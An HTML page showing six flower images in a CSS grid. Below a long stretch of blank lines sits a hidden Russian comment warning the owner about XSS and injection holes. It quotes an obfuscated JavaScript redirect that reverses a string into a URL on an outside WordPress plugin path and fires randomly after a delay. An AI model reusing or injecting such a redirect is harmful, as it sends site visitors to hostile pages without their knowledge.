<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>Web-Image</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
  <style>
    .grid-container {
      margin: 0 auto;
      max-width: 40%;
      display: grid;
      grid-template-areas: "post-1 post-2 post-2"  
                           "post-3 post-4 post-5"  
                           "post-3 post-6 post-6"; 
      grid-template-rows: repeat(3, 200px);
      grid-template-columns: repeat(3, 1fr);
      grid-gap: 15px;
    }
    .post{
    background-color: #e3e3e3;
    border-radius: 10px;
    text-align: center;
    }
  .post img{
    height: 100%;
    width: auto;
  }
    .post-1 {grid-area: post-1}
    .post-2 {grid-area: post-2}
    .post-3 {grid-area: post-3}
    .post-4 {grid-area: post-4}
    .post-5 {grid-area: post-5}
    .post-6 {grid-area: post-6; padding:0;}
    .post-2 img{rotate: 90deg;}
    .post-6 img{rotate: 270deg;}
  </style>
</head>
<!-- чо крч в классы докинем картиночки гыы -->
<body>

  <div class="grid-container">
    <div class="post post-1"><img src="img/flower-1.png" alt="цветочек 1"></div>
    <div class="post post-2"><img src="img/flower-2.png" alt="цветочек 2"></div>
    <div class="post post-3"><img src="img/flower-3.png" alt="цветочек 3"></div>
    <div class="post post-4"><img src="img/flower-4.png" alt="цветочек 4"></div>
    <div class="post post-5"><img src="img/flower-5.png" alt="цветочек 5"></div>
    <div class="post post-6"><img src="img/flower-6.png" alt="цветочек 6"></div>
  </div>
</body>
  
</html>





































































































































<!--у тебя много xss уязвимостей исправь пж)
https://webportal.com.ua/intro-pascal-abc/
1   $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}
вот тут к примеру так себе выглядит ну и иньекции зафикси пж а то твой оригинальный юзер syuxandrey в базе в первой айдишке печалит   -->